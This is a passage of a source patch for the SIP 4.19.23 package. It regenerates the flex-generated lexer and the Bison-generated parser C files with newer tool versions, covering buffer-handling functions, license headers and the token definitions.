"out of dynamic memory in yy_create_buffer()" ); + + b->yy_is_our_buffer = 1; + +- yy_init_buffer(b,file ); ++ yy_init_buffer( b, file ); + + return b; + } +@@ -3567,15 +3612,11 @@ static void yy_load_buffer_state (void) + YY_CURRENT_BUFFER_LVALUE = (YY_BUFFER_STATE) 0; + + if ( b->yy_is_our_buffer ) +- yyfree((void *) b->yy_ch_buf ); ++ yyfree( (void *) b->yy_ch_buf ); + +- yyfree((void *) b ); ++ yyfree( (void *) b ); + } + +-#ifndef __cplusplus +-extern int isatty (int ); +-#endif /* __cplusplus */ +- + /* Initializes or reinitializes a buffer. + * This function is sometimes called more than once on the same buffer, + * such as during a yyrestart() or at EOF. +@@ -3585,7 +3626,7 @@ extern int isatty (int ); + { + int oerrno = errno; + +- yy_flush_buffer(b ); ++ yy_flush_buffer( b ); + + b->yy_input_file = file; + b->yy_fill_buffer = 1; +@@ -3628,7 +3669,7 @@ extern int isatty (int ); + b->yy_buffer_status = YY_BUFFER_NEW; + + if ( b == YY_CURRENT_BUFFER ) +- yy_load_buffer_state( ); ++ yy_load_buffer_state( ); + } + + /** Pushes the new state onto the stack. The new state becomes +@@ -3659,7 +3700,7 @@ void yypush_buffer_state (YY_BUFFER_STAT + YY_CURRENT_BUFFER_LVALUE = new_buffer; + + /* copied from yy_switch_to_buffer. */ +- yy_load_buffer_state( ); ++ yy_load_buffer_state( ); + (yy_did_buffer_switch_on_eof) = 1; + } + +@@ -3678,7 +3719,7 @@ void yypop_buffer_state (void) + --(yy_buffer_stack_top); + + if (YY_CURRENT_BUFFER) { +- yy_load_buffer_state( ); ++ yy_load_buffer_state( ); + (yy_did_buffer_switch_on_eof) = 1; + } + } +@@ -3696,15 +3737,15 @@ static void yyensure_buffer_stack (void) + * scanner will even need a stack. We use 2 instead of 1 to avoid an + * immediate realloc on the next call. + */ +- num_to_alloc = 1; ++ num_to_alloc = 1; /* After all that talk, this was set to 1 anyways... */ + (yy_buffer_stack) = (struct yy_buffer_state**)yyalloc + (num_to_alloc * sizeof(struct yy_buffer_state*) + ); + if ( ! (yy_buffer_stack) ) + YY_FATAL_ERROR( "out of dynamic memory in yyensure_buffer_stack()" ); +- ++ + memset((yy_buffer_stack), 0, num_to_alloc * sizeof(struct yy_buffer_state*)); +- ++ + (yy_buffer_stack_max) = num_to_alloc; + (yy_buffer_stack_top) = 0; + return; +@@ -3713,7 +3754,7 @@ static void yyensure_buffer_stack (void) + if ((yy_buffer_stack_top) >= ((yy_buffer_stack_max)) - 1){ + + /* Increase the buffer to prepare for a possible push. */ +- int grow_size = 8 /* arbitrary grow size */; ++ yy_size_t grow_size = 8 /* arbitrary grow size */; + + num_to_alloc = (yy_buffer_stack_max) + grow_size; + (yy_buffer_stack) = (struct yy_buffer_state**)yyrealloc +@@ -3733,7 +3774,7 @@ static void yyensure_buffer_stack (void) + * @param base the character buffer + * @param size the size in bytes of the character buffer + * +- * @return the newly allocated buffer state object. ++ * @return the newly allocated buffer state object. + */ + YY_BUFFER_STATE yy_scan_buffer (char * base, yy_size_t size ) + { +@@ -3743,23 +3784,23 @@ YY_BUFFER_STATE yy_scan_buffer (char * + base[size-2] != YY_END_OF_BUFFER_CHAR || + base[size-1] != YY_END_OF_BUFFER_CHAR ) + /* They forgot to leave room for the EOB's. */ +- return 0; ++ return NULL; + +- b = (YY_BUFFER_STATE) yyalloc(sizeof( struct yy_buffer_state ) ); ++ b = (YY_BUFFER_STATE) yyalloc( sizeof( struct yy_buffer_state ) ); + if ( ! b ) + YY_FATAL_ERROR( "out of dynamic memory in yy_scan_buffer()" ); + +- b->yy_buf_size = size - 2; /* "- 2" to take care of EOB's */ ++ b->yy_buf_size = (int) (size - 2); /* "- 2" to take care of EOB's */ + b->yy_buf_pos = b->yy_ch_buf = base; + b->yy_is_our_buffer = 0; +- b->yy_input_file = 0; ++ b->yy_input_file = NULL; + b->yy_n_chars = b->yy_buf_size; + b->yy_is_interactive = 0; + b->yy_at_bol = 1; + b->yy_fill_buffer = 0; + b->yy_buffer_status = YY_BUFFER_NEW; + +- yy_switch_to_buffer(b ); ++ yy_switch_to_buffer( b ); + + return b; + } +@@ -3772,28 +3813,29 @@ YY_BUFFER_STATE yy_scan_buffer (char * + * @note If you want to scan bytes that may contain NUL values, then use + * yy_scan_bytes() instead. + */ +-YY_BUFFER_STATE yy_scan_string (yyconst char * yystr ) ++YY_BUFFER_STATE yy_scan_string (const char * yystr ) + { + +- return yy_scan_bytes(yystr,strlen(yystr) ); ++ return yy_scan_bytes( yystr, (int) strlen(yystr) ); + } + + /** Setup the input buffer state to scan the given bytes. The next call to yylex() will + * scan from a @e copy of @a bytes. +- * @param bytes the byte buffer to scan +- * @param len the number of bytes in the buffer pointed to by @a bytes. ++ * @param yybytes the byte buffer to scan ++ * @param _yybytes_len the number of bytes in the buffer pointed to by @a bytes. + * + * @return the newly allocated buffer state object. + */ +-YY_BUFFER_STATE yy_scan_bytes (yyconst char * yybytes, yy_size_t _yybytes_len ) ++YY_BUFFER_STATE yy_scan_bytes (const char * yybytes, int _yybytes_len ) + { + YY_BUFFER_STATE b; + char *buf; +- yy_size_t n, i; ++ yy_size_t n; ++ int i; + + /* Get memory for full buffer, including space for trailing EOB's. */ +- n = _yybytes_len + 2; +- buf = (char *) yyalloc(n ); ++ n = (yy_size_t) (_yybytes_len + 2); ++ buf = (char *) yyalloc( n ); + if ( ! buf ) + YY_FATAL_ERROR( "out of dynamic memory in yy_scan_bytes()" ); + +@@ -3802,7 +3844,7 @@ YY_BUFFER_STATE yy_scan_bytes (yyconst + + buf[_yybytes_len] = buf[_yybytes_len+1] = YY_END_OF_BUFFER_CHAR; + +- b = yy_scan_buffer(buf,n ); ++ b = yy_scan_buffer( buf, n ); + if ( ! b ) + YY_FATAL_ERROR( "bad buffer in yy_scan_bytes()" ); + +@@ -3814,20 +3856,21 @@ YY_BUFFER_STATE yy_scan_bytes (yyconst + return b; + } + +- static void yy_push_state (int new_state ) ++ static void yy_push_state (int _new_state ) + { + if ( (yy_start_stack_ptr) >= (yy_start_stack_depth) ) + { + yy_size_t new_size; + + (yy_start_stack_depth) += YY_START_STACK_INCR; +- new_size = (yy_start_stack_depth) * sizeof( int ); ++ new_size = (yy_size_t) (yy_start_stack_depth) * sizeof( int ); + + if ( ! (yy_start_stack) ) +- (yy_start_stack) = (int *) yyalloc(new_size ); ++ (yy_start_stack) = (int *) yyalloc( new_size ); + + else +- (yy_start_stack) = (int *) yyrealloc((void *) (yy_start_stack),new_size ); ++ (yy_start_stack) = (int *) yyrealloc( ++ (void *) (yy_start_stack), new_size ); + + if ( ! (yy_start_stack) ) + YY_FATAL_ERROR( "out of memory expanding start-condition stack" ); +@@ -3835,7 +3878,7 @@ YY_BUFFER_STATE yy_scan_bytes (yyconst + + (yy_start_stack)[(yy_start_stack_ptr)++] = YY_START; + +- BEGIN(new_state); ++ BEGIN(_new_state); + } + + static void yy_pop_state (void) +@@ -3855,9 +3898,9 @@ YY_BUFFER_STATE yy_scan_bytes (yyconst + #define YY_EXIT_FAILURE 2 + #endif + +-static void yy_fatal_error (yyconst char* msg ) ++static void yynoreturn yy_fatal_error (const char* msg ) + { +- (void) fprintf( stderr, "%s\n", msg ); ++ fprintf( stderr, "%s\n", msg ); + exit( YY_EXIT_FAILURE ); + } + +@@ -3885,7 +3928,7 @@ static void yy_fatal_error (yyconst char + */ + int yyget_lineno (void) + { +- ++ + return yylineno; + } + +@@ -3908,7 +3951,7 @@ FILE *yyget_out (void) + /** Get the length of the current token. + * + */ +-yy_size_t yyget_leng (void) ++int yyget_leng (void) + { + return yyleng; + } +@@ -3923,29 +3966,29 @@ char *yyget_text (void) + } + + /** Set the current line number. +- * @param line_number ++ * @param _line_number line number + * + */ +-void yyset_lineno (int line_number ) ++void yyset_lineno (int _line_number ) + { + +- yylineno = line_number; ++ yylineno = _line_number; + } + + /** Set the input stream. This does not discard the current + * input buffer. +- * @param in_str A readable stream. ++ * @param _in_str A readable stream. + * + * @see yy_switch_to_buffer + */ +-void yyset_in (FILE * in_str ) ++void yyset_in (FILE * _in_str ) + { +- yyin = in_str ; ++ yyin = _in_str ; + } + +-void yyset_out (FILE * out_str ) ++void yyset_out (FILE * _out_str ) + { +- yyout = out_str ; ++ yyout = _out_str ; + } + + int yyget_debug (void) +@@ -3953,9 +3996,9 @@ int yyget_debug (void) + return yy_flex_debug; + } + +-void yyset_debug (int bdebug ) ++void yyset_debug (int _bdebug ) + { +- yy_flex_debug = bdebug ; ++ yy_flex_debug = _bdebug ; + } + + static int yy_init_globals (void) +@@ -3964,10 +4007,10 @@ static int yy_init_globals (void) + * This function is called from yylex_destroy(), so don't allocate here. + */ + +- (yy_buffer_stack) = 0; ++ (yy_buffer_stack) = NULL; + (yy_buffer_stack_top) = 0; + (yy_buffer_stack_max) = 0; +- (yy_c_buf_p) = (char *) 0; ++ (yy_c_buf_p) = NULL; + (yy_init) = 0; + (yy_start) = 0; + +@@ -3980,8 +4023,8 @@ static int yy_init_globals (void) + yyin = stdin; + yyout = stdout; + #else +- yyin = (FILE *) 0; +- yyout = (FILE *) 0; ++ yyin = NULL; ++ yyout = NULL; + #endif + + /* For future reference: Set errno on error, since we are called by +@@ -3996,7 +4039,7 @@ int yylex_destroy (void) + + /* Pop the buffer stack, destroying each element. */ + while(YY_CURRENT_BUFFER){ +- yy_delete_buffer(YY_CURRENT_BUFFER ); ++ yy_delete_buffer( YY_CURRENT_BUFFER ); + YY_CURRENT_BUFFER_LVALUE = NULL; + yypop_buffer_state(); + } +@@ -4006,7 +4049,7 @@ int yylex_destroy (void) + (yy_buffer_stack) = NULL; + + /* Destroy the start condition stack. */ +- yyfree((yy_start_stack) ); ++ yyfree( (yy_start_stack) ); + (yy_start_stack) = NULL; + + /* Reset the globals. This is important in a non-reentrant scanner so the next time +@@ -4021,18 +4064,19 @@ int yylex_destroy (void) + */ + + #ifndef yytext_ptr +-static void yy_flex_strncpy (char* s1, yyconst char * s2, int n ) ++static void yy_flex_strncpy (char* s1, const char * s2, int n ) + { +- register int i; ++ ++ int i; + for ( i = 0; i < n; ++i ) + s1[i] = s2[i]; + } + #endif + + #ifdef YY_NEED_STRLEN +-static int yy_flex_strlen (yyconst char * s ) ++static int yy_flex_strlen (const char * s ) + { +- register int n; ++ int n; + for ( n = 0; s[n]; ++n ) + ; + +@@ -4042,11 +4086,12 @@ static int yy_flex_strlen (yyconst char + + void *yyalloc (yy_size_t size ) + { +- return (void *) malloc( size ); ++ return malloc(size); + } + + void *yyrealloc (void * ptr, yy_size_t size ) + { ++ + /* The cast to (char *) in the following accommodates both + * implementations that use char* generic pointers, and those + * that use void* generic pointers. It works with the latter +@@ -4054,18 +4099,17 @@ void *yyrealloc (void * ptr, yy_size_t + * any pointer type to void*, and deal with argument conversions + * as though doing an assignment. + */ +- return (void *) realloc( (char *) ptr, size ); ++ return realloc(ptr, size); + } + + void yyfree (void * ptr ) + { +- free( (char *) ptr ); /* see yyrealloc() for (char *) cast */ ++ free( (char *) ptr ); /* see yyrealloc() for (char *) cast */ + } + + #define YYTABLES_NAME "yytables" + +-#line 633 "sip-4.19.23/sipgen/metasrc/lexer.l" +- ++#line 635 "lexer.l" + + + /* +Index: sip-4.19.23/sipgen/parser.c +=================================================================== +--- sip-4.19.23.orig/sipgen/parser.c ++++ sip-4.19.23/sipgen/parser.c +@@ -1,14 +1,14 @@ +-/* A Bison parser, made by GNU Bison 2.3. */ ++/* A Bison parser, made by GNU Bison 3.8.2. */ + +-/* Skeleton implementation for Bison's Yacc-like parsers in C ++/* Bison implementation for Yacc-like parsers in C + +- Copyright (C) 1984, 1989, 1990, 2000, 2001, 2002, 2003, 2004, 2005, 2006 +- Free Software Foundation, Inc. ++ Copyright (C) 1984, 1989-1990, 2000-2015, 2018-2021 Free Software Foundation, ++ Inc. + +- This program is free software; you can redistribute it and/or modify ++ This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by +- the Free Software Foundation; either version 2, or (at your option) +- any later version. ++ the Free Software Foundation, either version 3 of the License, or ++ (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of +@@ -16,9 +16,7 @@ + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License +- along with this program; if not, write to the Free Software +- Foundation, Inc., 51 Franklin Street, Fifth Floor, +- Boston, MA 02110-1301, USA. */ ++ along with this program. If not, see <https://www.gnu.org/licenses/>. */ + + /* As a special exception, you may create a larger work that contains + part or all of the Bison parser skeleton and distribute that work +@@ -36,6 +34,10 @@ + /* C LALR(1) parser skeleton written by Richard Stallman, by + simplifying the original so-called "semantic" parser. */ + ++/* DO NOT RELY ON FEATURES THAT ARE NOT DOCUMENTED in the manual, ++ especially those whose name start with YY_ or yy_. They are ++ private implementation details that can be changed or removed. */ ++ + /* All symbols defined below should begin with yy or YY, to avoid + infringing on user name space. This should be done even for local + variables, as they might otherwise be expanded by user macros. +@@ -43,11 +45,11 @@ + define necessary library symbols; they are noted "INFRINGES ON + USER NAME SPACE" below. */ + +-/* Identify Bison output. */ +-#define YYBISON 1 ++/* Identify Bison output, and Bison version. */ ++#define YYBISON 30802 + +-/* Bison version. */ +-#define YYBISON_VERSION "2.3" ++/* Bison version string. */ ++#define YYBISON_VERSION "3.8.2" + + /* Skeleton name. */ + #define YYSKELETON_NAME "yacc.c" +@@ -55,324 +57,17 @@ + /* Pure parsers. */ + #define YYPURE 0 + +-/* Using locations. */ +-#define YYLSP_NEEDED 0 +- ++/* Push parsers. */ ++#define YYPUSH 0 + +- +-/* Tokens. */ +-#ifndef YYTOKENTYPE +-# define YYTOKENTYPE +- /* Put the tokens into the symbol table, so that GDB and other debuggers +- know about them. */ +- enum yytokentype { +- TK_API = 258, +- TK_AUTOPYNAME = 259, +- TK_DEFDOCSTRFMT = 260, +- TK_DEFDOCSTRSIG = 261, +- TK_DEFENCODING = 262, +- TK_PLUGIN = 263, +- TK_VIRTERRORHANDLER = 264, +- TK_EXPTYPEHINTCODE = 265, +- TK_TYPEHINTCODE = 266, +- TK_DOCSTRING = 267, +- TK_DOC = 268, +- TK_EXPORTEDDOC = 269, +- TK_EXTRACT = 270, +- TK_MAKEFILE = 271, +- TK_ACCESSCODE = 272, +- TK_GETCODE = 273, +- TK_SETCODE = 274, +- TK_PREINITCODE = 275, +- TK_INITCODE = 276, +- TK_POSTINITCODE = 277, +- TK_FINALCODE = 278, +- TK_UNITCODE = 279, +- TK_UNITPOSTINCLUDECODE = 280, +- TK_MODCODE = 281, +- TK_TYPECODE = 282, +- TK_PREPYCODE = 283, +- TK_COPYING = 284, +- TK_MAPPEDTYPE = 285, +- TK_CODELINE = 286, +- TK_IF = 287, +- TK_END = 288, +- TK_NAME_VALUE = 289, +- TK_PATH_VALUE = 290, +- TK_STRING_VALUE = 291, +- TK_VIRTUALCATCHERCODE = 292, +- TK_TRAVERSECODE = 293, +- TK_CLEARCODE = 294, +- TK_GETBUFFERCODE = 295, +- TK_RELEASEBUFFERCODE = 296, +- TK_READBUFFERCODE = 297, +- TK_WRITEBUFFERCODE = 298, +- TK_SEGCOUNTCODE = 299, +- TK_CHARBUFFERCODE = 300, +- TK_PICKLECODE = 301, +- TK_VIRTUALCALLCODE = 302, +- TK_METHODCODE = 303, +- TK_PREMETHODCODE = 304, +- TK_INSTANCECODE = 305, +- TK_FROMTYPE = 306, +- TK_TOTYPE = 307, +- TK_TOSUBCLASS = 308, +- TK_INCLUDE = 309, +- TK_OPTINCLUDE = 310, +- TK_IMPORT = 311, +- TK_EXPHEADERCODE = 312, +- TK_MODHEADERCODE = 313, +- TK_TYPEHEADERCODE = 314, +- TK_MODULE = 315, +- TK_CMODULE = 316, +- TK_CONSMODULE = 317, +- TK_COMPOMODULE = 318, +- TK_CLASS = 319, +- TK_STRUCT = 320, +- TK_PUBLIC = 321, +- TK_PROTECTED = 322, +- TK_PRIVATE = 323, +- TK_SIGNALS = 324, +- TK_SIGNAL_METHOD = 325, +- TK_SLOTS = 326, +- TK_SLOT_METHOD = 327, +- TK_BOOL = 328, +- TK_SHORT = 329, +- TK_INT = 330, +- TK_LONG = 331, +- TK_FLOAT = 332, +- TK_DOUBLE = 333, +- TK_CHAR = 334, +- TK_WCHAR_T = 335, +- TK_VOID = 336, +- TK_PYOBJECT = 337, +- TK_PYTUPLE = 338, +- TK_PYLIST = 339, +- TK_PYDICT = 340, +- TK_PYCALLABLE = 341, +- TK_PYSLICE = 342, +- TK_PYTYPE = 343, +- TK_PYBUFFER = 344, +- TK_VIRTUAL = 345, +- TK_ENUM = 346, +- TK_SIGNED = 347, +- TK_UNSIGNED = 348, +- TK_SCOPE = 349, +- TK_LOGICAL_OR = 350, +- TK_CONST = 351, +- TK_STATIC = 352, +- TK_SIPSIGNAL = 353, +- TK_SIPSLOT = 354, +- TK_SIPANYSLOT = 355, +- TK_SIPRXCON = 356, +- TK_SIPRXDIS = 357, +- TK_SIPSLOTCON = 358, +- TK_SIPSLOTDIS = 359, +- TK_SIPSSIZET = 360, +- TK_SIZET = 361, +- TK_NUMBER_VALUE = 362, +- TK_REAL_VALUE = 363, +- TK_TYPEDEF = 364, +- TK_NAMESPACE = 365, +- TK_TIMELINE = 366, +- TK_PLATFORMS = 367, +- TK_FEATURE = 368, +- TK_LICENSE = 369, +- TK_QCHAR_VALUE = 370, +- TK_TRUE_VALUE = 371, +- TK_FALSE_VALUE = 372, +- TK_NULL_VALUE = 373, +- TK_OPERATOR = 374, +- TK_THROW = 375, +- TK_QOBJECT = 376, +- TK_EXCEPTION = 377, +- TK_RAISECODE = 378, +- TK_EXPLICIT = 379, +- TK_TEMPLATE = 380, +- TK_FINAL = 381, +- TK_ELLIPSIS = 382, +- TK_DEFMETATYPE = 383, +- TK_DEFSUPERTYPE = 384, +- TK_PROPERTY = 385, +- TK_HIDE_NS = 386, +- TK_FORMAT = 387, +- TK_GET = 388, +- TK_ID = 389, +- TK_KWARGS = 390, +- TK_LANGUAGE = 391, +- TK_LICENSEE = 392, +- TK_NAME = 393, +- TK_OPTIONAL = 394, +- TK_ORDER = 395, +- TK_REMOVELEADING = 396, +- TK_SET = 397, +- TK_SIGNATURE = 398, +- TK_TIMESTAMP = 399, +- TK_TYPE = 400, +- TK_USEARGNAMES = 401, +- TK_USELIMITEDAPI = 402, +- TK_ALLRAISEPYEXC = 403, +- TK_CALLSUPERINIT = 404, +- TK_DEFERRORHANDLER = 405, +- TK_VERSION = 406 +- }; +-#endif +-/* Tokens. */ +-#define TK_API 258 +-#define TK_AUTOPYNAME 259 +-#define TK_DEFDOCSTRFMT 260 +-#define TK_DEFDOCSTRSIG 261 +-#define TK_DEFENCODING 262 +-#define TK_PLUGIN 263 +-#define TK_VIRTERRORHANDLER 264 +-#define TK_EXPTYPEHINTCODE 265 +-#define TK_TYPEHINTCODE 266 +-#define TK_DOCSTRING 267 +-#define TK_DOC 268 +-#define TK_EXPORTEDDOC 269 +-#define TK_EXTRACT 270 +-#define TK_MAKEFILE 271 +-#define TK_ACCESSCODE 272 +-#define TK_GETCODE 273 +-#define TK_SETCODE 274 +-#define TK_PREINITCODE 275 +-#define TK_INITCODE 276 +-#define TK_POSTINITCODE 277 +-#define TK_FINALCODE 278 +-#define TK_UNITCODE 279 +-#define TK_UNITPOSTINCLUDECODE 280 +-#define TK_MODCODE 281 +-#define TK_TYPECODE 282 +-#define TK_PREPYCODE 283 +-#define TK_COPYING 284 +-#define TK_MAPPEDTYPE 285 +-#define TK_CODELINE 286 +-#define TK_IF 287 +-#define TK_END 288 +-#define TK_NAME_VALUE 289 +-#define TK_PATH_VALUE 290 +-#define TK_STRING_VALUE 291 +-#define TK_VIRTUALCATCHERCODE 292 +-#define TK_TRAVERSECODE 293 +-#define TK_CLEARCODE 294 +-#define TK_GETBUFFERCODE 295 +-#define TK_RELEASEBUFFERCODE 296 +-#define TK_READBUFFERCODE 297 +-#define TK_WRITEBUFFERCODE 298 +-#define TK_SEGCOUNTCODE 299 +-#define TK_CHARBUFFERCODE 300 +-#define TK_PICKLECODE 301 +-#define TK_VIRTUALCALLCODE 302 +-#define TK_METHODCODE 303 +-#define TK_PREMETHODCODE 304 +-#define TK_INSTANCECODE 305 +-#define TK_FROMTYPE 306 +-#define TK_TOTYPE 307 +-#define TK_TOSUBCLASS 308 +-#define TK_INCLUDE 309 +-#define TK_OPTINCLUDE 310 +-#define TK_IMPORT 311 +-#define TK_EXPHEADERCODE 312 +-#define TK_MODHEADERCODE 313 +-#define TK_TYPEHEADERCODE 314 +-#define TK_MODULE 315 +-#define TK_CMODULE 316 +-#define TK_CONSMODULE 317 +-#define TK_COMPOMODULE 318 +-#define TK_CLASS 319 +-#define TK_STRUCT 320 +-#define TK_PUBLIC 321 +-#define TK_PROTECTED 322 +-#define TK_PRIVATE 323 +-#define TK_SIGNALS 324 +-#define TK_SIGNAL_METHOD 325 +-#define TK_SLOTS 326 +-#define TK_SLOT_METHOD 327 +-#define TK_BOOL 328 +-#define TK_SHORT 329 +-#define TK_INT 330 +-#define TK_LONG 331 +-#define TK_FLOAT 332 +-#define TK_DOUBLE 333 +-#define TK_CHAR 334 +-#define TK_WCHAR_T 335 +-#define TK_VOID 336 +-#define TK_PYOBJECT 337 +-#define TK_PYTUPLE 338 +-#define TK_PYLIST 339 +-#define TK_PYDICT 340 +-#define TK_PYCALLABLE 341 +-#define TK_PYSLICE 342 +-#define TK_PYTYPE 343 +-#define TK_PYBUFFER 344 +-#define TK_VIRTUAL 345 +-#define TK_ENUM 346 +-#define TK_SIGNED 347 +-#define TK_UNSIGNED 348 +-#define TK_SCOPE 349 +-#define TK_LOGICAL_OR 350 +-#define TK_CONST 351 +-#define TK_STATIC 352 +-#define TK_SIPSIGNAL 353 +-#define TK_SIPSLOT 354 +-#define TK_SIPANYSLOT 355 +-#define TK_SIPRXCON 356 +-#define TK_SIPRXDIS 357 +-#define TK_SIPSLOTCON 358 +-#define TK_SIPSLOTDIS 359 +-#define TK_SIPSSIZET 360 +-#define TK_SIZET 361 +-#define TK_NUMBER_VALUE 362 +-#define TK_REAL_VALUE 363 +-#define TK_TYPEDEF 364 +-#define TK_NAMESPACE 365 +-#define TK_TIMELINE 366 +-#define TK_PLATFORMS 367 +-#define TK_FEATURE 368 +-#define TK_LICENSE 369 +-#define TK_QCHAR_VALUE 370 +-#define TK_TRUE_VALUE 371 +-#define TK_FALSE_VALUE 372 +-#define TK_NULL_VALUE 373 +-#define TK_OPERATOR 374 +-#define TK_THROW 375 +-#define TK_QOBJECT 376 +-#define TK_EXCEPTION 377 +-#define TK_RAISECODE 378 +-#define TK_EXPLICIT 379 +-#define TK_TEMPLATE 380 +-#define TK_FINAL 381 +-#define TK_ELLIPSIS 382 +-#define TK_DEFMETATYPE 383 +-#define TK_DEFSUPERTYPE 384 +-#define TK_PROPERTY 385 +-#define TK_HIDE_NS 386 +-#define TK_FORMAT 387 +-#define TK_GET 388 +-#define TK_ID 389 +-#define TK_KWARGS 390 +-#define TK_LANGUAGE 391 +-#define TK_LICENSEE 392 +-#define TK_NAME 393 +-#define TK_OPTIONAL 394 +-#define TK_ORDER 395 +-#define TK_REMOVELEADING 396 +-#define TK_SET 397 +-#define TK_SIGNATURE 398 +-#define TK_TIMESTAMP 399 +-#define TK_TYPE 400 +-#define TK_USEARGNAMES 401 +-#define TK_USELIMITEDAPI 402 +-#define TK_ALLRAISEPYEXC 403 +-#define TK_CALLSUPERINIT 404 +-#define TK_DEFERRORHANDLER 405 +-#define TK_VERSION 406 ++/* Pull parsers. */ ++#define YYPULL 1 + + + + +-/* Copy the first part of user declarations. */ +-#line 19 "sip-4.19.23/sipgen/metasrc/parser.y" ++/* First part of user prologue. */ ++#line 19 "parser.y" + + #include <stdlib.h> + #include <string.h> +@@ -539,9 +234,9 @@ static void addProperty(sipSpec *pt, mod + docstringDef *docstring); + static moduleDef *configureModule(sipSpec *pt, moduleDef *module, + const char *filename, const char *name, int c_module, KwArgs kwargs, +- int use_arg_names, int use_limited_api, int call_super_init, +- int all_raise_py_exc, const char *def_error_handler, +- docstringDef *docstring); ++ int use_arg_names, int py_ssize_t_clean, int use_limited_api, ++ int call_super_init, int all_raise_py_exc, ++ const char *def_error_handler, docstringDef *docstring); + static void addAutoPyName(moduleDef *mod, const char *remove_leading); + static KwArgs convertKwArgs(const char *kwargs); + static void checkAnnos(optFlags *annos, const char *valid[]); +@@ -555,117 +250,555 @@ static int isBackstop(qualDef *qd); + static void checkEllipsis(signatureDef *sd); + static scopedNameDef *fullyQualifiedName(scopedNameDef *snd); + ++#line 254 "../parser.c" + +-/* Enabling traces. */ +-#ifndef YYDEBUG +-# define YYDEBUG 0 +-#endif +- +-/* Enabling verbose error messages. */ +-#ifdef YYERROR_VERBOSE +-# undef YYERROR_VERBOSE +-# define YYERROR_VERBOSE 1 +-#else +-# define YYERROR_VERBOSE 0 +-#endif +- +-/* Enabling the token table. */ +-#ifndef YYTOKEN_TABLE +-# define YYTOKEN_TABLE 0 +-#endif +- +-#if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED +-typedef union YYSTYPE +-#line 202 "sip-4.19.23/sipgen/metasrc/parser.y" +-{ +- char qchar; +- char *text; +- long number; +- double real; +- argDef memArg; +- signatureDef signature; +- signatureDef *optsignature; +- throwArgs *throwlist; +- codeBlock *codeb; +- docstringDef *docstr; +- valueDef value; +- valueDef *valp; +- optFlags optflags; +- optFlag flag; +- scopedNameDef *scpvalp; +- fcallDef fcall; +- int boolean; +- exceptionDef exceptionbase; +- classDef *klass; +- apiCfg api; +- autoPyNameCfg autopyname; +- compModuleCfg compmodule; +- consModuleCfg consmodule; +- defDocstringFmtCfg defdocstringfmt; +- defDocstringSigCfg defdocstringsig; +- defEncodingCfg defencoding; +- defMetatypeCfg defmetatype; +- defSupertypeCfg defsupertype; +- hiddenNsCfg hiddenns; +- exceptionCfg exception; +- docstringCfg docstring; +- extractCfg extract; +- featureCfg feature; +- licenseCfg license; +- importCfg import; +- includeCfg include; +- moduleCfg module; +- pluginCfg plugin; +- propertyCfg property; +- variableCfg variable; +- vehCfg veh; +- int token; +-} +-/* Line 193 of yacc.c. */ +-#line 626 "sip-4.19.23/sipgen/parser.c" +- YYSTYPE; +-# define yystype YYSTYPE /* obsolescent; will be withdrawn */ +-# define YYSTYPE_IS_DECLARED 1 +-# define YYSTYPE_IS_TRIVIAL 1 +-#endif +- ++# ifndef YY_CAST ++# ifdef __cplusplus ++# define YY_CAST(Type, Val) static_cast<Type> (Val) ++# define YY_REINTERPRET_CAST(Type, Val) reinterpret_cast<Type> (Val) ++# else ++# define YY_CAST(Type, Val) ((Type) (Val)) ++# define YY_REINTERPRET_CAST(Type, Val) ((Type) (Val)) ++# endif ++# endif ++# ifndef YY_NULLPTR ++# if defined __cplusplus ++# if 201103L <= __cplusplus ++# define YY_NULLPTR nullptr ++# else ++# define YY_NULLPTR 0 ++# endif ++# else ++# define YY_NULLPTR ((void*)0) ++# endif ++# endif + ++#include "parser.h" ++/* Symbol kind. */ ++enum yysymbol_kind_t ++{ ++ YYSYMBOL_YYEMPTY = -2, ++ YYSYMBOL_YYEOF = 0, /* "end of file" */ ++ YYSYMBOL_YYerror = 1, /* error */ ++ YYSYMBOL_YYUNDEF = 2, /* "invalid token" */ ++ YYSYMBOL_TK_API = 3, /* TK_API */ ++ YYSYMBOL_TK_AUTOPYNAME = 4, /* TK_AUTOPYNAME */ ++ YYSYMBOL_TK_DEFDOCSTRFMT = 5, /* TK_DEFDOCSTRFMT */ ++ YYSYMBOL_TK_DEFDOCSTRSIG = 6, /* TK_DEFDOCSTRSIG */ ++ YYSYMBOL_TK_DEFENCODING = 7, /* TK_DEFENCODING */ ++ YYSYMBOL_TK_PLUGIN = 8, /* TK_PLUGIN */ ++ YYSYMBOL_TK_VIRTERRORHANDLER = 9, /* TK_VIRTERRORHANDLER */ ++ YYSYMBOL_TK_EXPTYPEHINTCODE = 10, /* TK_EXPTYPEHINTCODE */ ++ YYSYMBOL_TK_TYPEHINTCODE = 11, /* TK_TYPEHINTCODE */ ++ YYSYMBOL_TK_DOCSTRING = 12, /* TK_DOCSTRING */ ++ YYSYMBOL_TK_DOC = 13, /* TK_DOC */ ++ YYSYMBOL_TK_EXPORTEDDOC = 14, /* TK_EXPORTEDDOC */ ++ YYSYMBOL_TK_EXTRACT = 15, /* TK_EXTRACT */ ++ YYSYMBOL_TK_MAKEFILE = 16, /* TK_MAKEFILE */ ++ YYSYMBOL_TK_ACCESSCODE = 17, /* TK_ACCESSCODE */ ++ YYSYMBOL_TK_GETCODE = 18, /* TK_GETCODE */ ++ YYSYMBOL_TK_SETCODE = 19, /* TK_SETCODE */ ++ YYSYMBOL_TK_PREINITCODE = 20, /* TK_PREINITCODE */ ++ YYSYMBOL_TK_INITCODE = 21, /* TK_INITCODE */ ++ YYSYMBOL_TK_POSTINITCODE = 22, /* TK_POSTINITCODE */ ++ YYSYMBOL_TK_FINALCODE = 23, /* TK_FINALCODE */ ++ YYSYMBOL_TK_UNITCODE = 24, /* TK_UNITCODE */ ++ YYSYMBOL_TK_UNITPOSTINCLUDECODE = 25, /* TK_UNITPOSTINCLUDECODE */ ++ YYSYMBOL_TK_MODCODE = 26, /* TK_MODCODE */ ++ YYSYMBOL_TK_TYPECODE = 27, /* TK_TYPECODE */ ++ YYSYMBOL_TK_PREPYCODE = 28, /* TK_PREPYCODE */ ++ YYSYMBOL_TK_COPYING = 29, /* TK_COPYING */ ++ YYSYMBOL_TK_MAPPEDTYPE = 30, /* TK_MAPPEDTYPE */ ++ YYSYMBOL_TK_CODELINE = 31, /* TK_CODELINE */ ++ YYSYMBOL_TK_IF = 32, /* TK_IF 